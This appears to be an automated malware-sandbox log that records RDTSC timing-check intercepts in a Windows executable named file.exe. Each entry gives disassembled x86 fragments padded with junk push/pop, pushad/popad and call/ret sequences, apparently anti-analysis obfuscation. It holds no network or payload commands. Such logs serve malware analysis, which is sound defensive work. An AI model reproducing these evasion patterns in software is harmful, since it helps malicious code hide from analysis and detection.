Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EFCDE second address: 7EFCEC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF40CBDB928h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EFCEC second address: 7EFCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EFFE5 second address: 7EFFED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EFFED second address: 7F0007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B066h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1D60 second address: 7F1D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1E83 second address: 7F1EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF40C70B062h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1EB8 second address: 7F1EEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007FF40CBDB938h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F21B8 second address: 7F21BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F246D second address: 7F2474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F2CCD second address: 7F2CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F2F73 second address: 7F2F7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F2F7C second address: 7F2F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F341B second address: 7F3420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F3420 second address: 7F348C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B064h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e clc 0x0000000f or esi, 5D8D013Ch 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FF40C70B058h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 xchg eax, ebx 0x00000032 js 00007FF40C70B067h 0x00000038 jmp 00007FF40C70B061h 0x0000003d push eax 0x0000003e push esi 0x0000003f pushad 0x00000040 jc 00007FF40C70B056h 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F3E54 second address: 7F3E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F3E58 second address: 7F3E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F3E5E second address: 7F3EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB938h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx edi, bx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FF40CBDB928h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b or dword ptr [ebp+122D3864h], esi 0x00000031 mov edi, dword ptr [ebp+122D1D1Ch] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007FF40CBDB928h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 xor dword ptr [ebp+1247FC3Ch], esi 0x00000059 xchg eax, ebx 0x0000005a jmp 00007FF40CBDB934h 0x0000005f push eax 0x00000060 pushad 0x00000061 jnp 00007FF40CBDB928h 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4FDA second address: 7F4FFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF40C70B061h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F6490 second address: 7F6496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F6496 second address: 7F649A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F6E9C second address: 7F6EA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F79CD second address: 7F79D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F79D1 second address: 7F79EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF40CBDB935h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F79EA second address: 7F79EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F84FD second address: 7F8507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F8507 second address: 7F850B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F820B second address: 7F820F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F820F second address: 7F8215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F8215 second address: 7F8231 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF40CBDB928h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FF40CBDB92Bh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FCB3D second address: 7FCBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007FF40C70B058h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 0000001Dh 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 sub dword ptr [ebp+122D3864h], edx 0x00000026 push 00000000h 0x00000028 mov di, 2913h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FF40C70B058h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 jc 00007FF40C70B059h 0x0000004e mov di, ax 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 jne 00007FF40C70B05Ch 0x00000059 pop eax 0x0000005a push eax 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FCBB9 second address: 7FCBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDBB5 second address: 7FDBB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FEC52 second address: 7FEC6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB92Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF40CBDB928h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FFD10 second address: 7FFD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FFD14 second address: 7FFD1A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FFD1A second address: 7FFD1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F8CD1 second address: 7F8CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 800BBD second address: 800C44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a nop 0x0000000b or bx, 620Ah 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FF40C70B058h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c or bh, 00000000h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FF40C70B058h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b and ebx, 00904060h 0x00000051 xchg eax, esi 0x00000052 jnc 00007FF40C70B064h 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FF40C70B05Ch 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 800C44 second address: 800C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 800C48 second address: 800C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDD2B second address: 7FDD57 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF40CBDB932h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FF40CBDB933h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDD57 second address: 7FDDD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FF40C70B058h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jnc 00007FF40C70B05Ch 0x0000002a push dword ptr fs:[00000000h] 0x00000031 movzx ebx, di 0x00000034 mov ebx, 4BC3A320h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov di, B7BDh 0x00000044 mov eax, dword ptr [ebp+122D01B9h] 0x0000004a jg 00007FF40C70B05Ah 0x00000050 adc bl, FFFFFFA4h 0x00000053 push FFFFFFFFh 0x00000055 or edi, dword ptr [ebp+122D3568h] 0x0000005b push eax 0x0000005c pushad 0x0000005d push esi 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FEE61 second address: 7FEE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FEE66 second address: 7FEE80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF40C70B066h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806B9E second address: 806C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FF40CBDB928h 0x0000000b popad 0x0000000c nop 0x0000000d mov edi, 2380CD1Ch 0x00000012 push 00000000h 0x00000014 jmp 00007FF40CBDB92Dh 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FF40CBDB928h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 xchg eax, esi 0x00000036 jmp 00007FF40CBDB936h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF40CBDB931h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802E05 second address: 802E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808C72 second address: 808C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802EF2 second address: 802EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808C76 second address: 808C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808C7C second address: 808C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804DFF second address: 804E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805E23 second address: 805EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FF40C70B058h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D3179h], esi 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov ebx, 1C691B4Ah 0x00000034 jnl 00007FF40C70B05Ah 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov ebx, dword ptr [ebp+122D2968h] 0x00000047 clc 0x00000048 mov eax, dword ptr [ebp+122D11F1h] 0x0000004e push 00000000h 0x00000050 push ecx 0x00000051 call 00007FF40C70B058h 0x00000056 pop ecx 0x00000057 mov dword ptr [esp+04h], ecx 0x0000005b add dword ptr [esp+04h], 00000016h 0x00000063 inc ecx 0x00000064 push ecx 0x00000065 ret 0x00000066 pop ecx 0x00000067 ret 0x00000068 cld 0x00000069 push FFFFFFFFh 0x0000006b mov edi, dword ptr [ebp+122D3798h] 0x00000071 push eax 0x00000072 pushad 0x00000073 je 00007FF40C70B05Ch 0x00000079 jno 00007FF40C70B056h 0x0000007f push eax 0x00000080 push edx 0x00000081 push edx 0x00000082 pop edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80EEE0 second address: 80EEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80EEE6 second address: 80EF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jne 00007FF40C70B056h 0x0000000c jno 00007FF40C70B056h 0x00000012 js 00007FF40C70B056h 0x00000018 jmp 00007FF40C70B05Bh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80EF0A second address: 80EF28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF40CBDB926h 0x0000000a jmp 00007FF40CBDB934h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80EF28 second address: 80EF4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B066h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80F9D0 second address: 80F9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80F9D6 second address: 80F9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF40C70B05Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80F9EE second address: 80F9F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A96BA second address: 7A96C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A96C2 second address: 7A96C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8169BF second address: 8169C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 816B67 second address: 816B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81AF46 second address: 81AF8A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF40C70B058h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jo 00007FF40C70B05Ch 0x00000014 jbe 00007FF40C70B056h 0x0000001a jo 00007FF40C70B05Ch 0x00000020 jg 00007FF40C70B056h 0x00000026 popad 0x00000027 mov eax, dword ptr [esp+04h] 0x0000002b pushad 0x0000002c push esi 0x0000002d jmp 00007FF40C70B063h 0x00000032 pop esi 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81AF8A second address: 81AFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF40CBDB93Ch 0x00000010 jmp 00007FF40CBDB936h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81AFB0 second address: 81AFD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81AFD5 second address: 81AFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81AFD9 second address: 81AFDF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81AFDF second address: 81AFE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81AFE5 second address: 81AFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F860 second address: 81F86A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF40CBDB926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F86A second address: 81F882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FF40C70B058h 0x0000000c pop edi 0x0000000d pushad 0x0000000e jo 00007FF40C70B05Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F882 second address: 81F896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF40CBDB92Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81F896 second address: 81F8B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B05Eh 0x00000007 jnc 00007FF40C70B056h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FF40C70B056h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824F0E second address: 824F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 823BE4 second address: 823BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 823BEA second address: 823BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF40CBDB926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 823BF9 second address: 823BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 823BFD second address: 823C09 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 823C09 second address: 823C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF40C70B062h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8241E2 second address: 8241E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824657 second address: 824661 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF40C70B05Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824BDD second address: 824C22 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF40CBDB928h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007FF40CBDB926h 0x00000011 jmp 00007FF40CBDB92Bh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF40CBDB92Fh 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FF40CBDB92Fh 0x00000028 popad 0x00000029 rdtsc
